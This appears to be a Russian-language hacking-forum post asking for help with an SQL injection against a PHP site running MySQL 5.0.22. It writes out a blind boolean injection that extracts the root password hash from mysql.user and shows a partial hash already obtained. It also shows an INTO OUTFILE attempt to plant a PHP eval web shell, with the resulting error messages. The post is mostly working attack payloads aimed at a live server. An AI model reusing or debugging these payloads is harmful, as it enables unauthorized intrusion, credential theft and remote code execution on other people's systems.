приветствую!

столкнулся с такой проблемой (

http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20m ysql.user%20where%20user=char(114,111,111,116)),1, 1))>=100,1,0)/*

Error Number: 1242
Error Message: Subquery returns more than 1 row

а в случае

1=if(ascii(substring((select user()),1,1))>=100,1,0)

все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать )

права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает...
------------------------------------------------------------------
и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает.....

http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2

если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt....

Error Number: 1064
Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2

уже и так писал и сяк, не получается с этим серваком (((


версия 5.0.22

с уважением,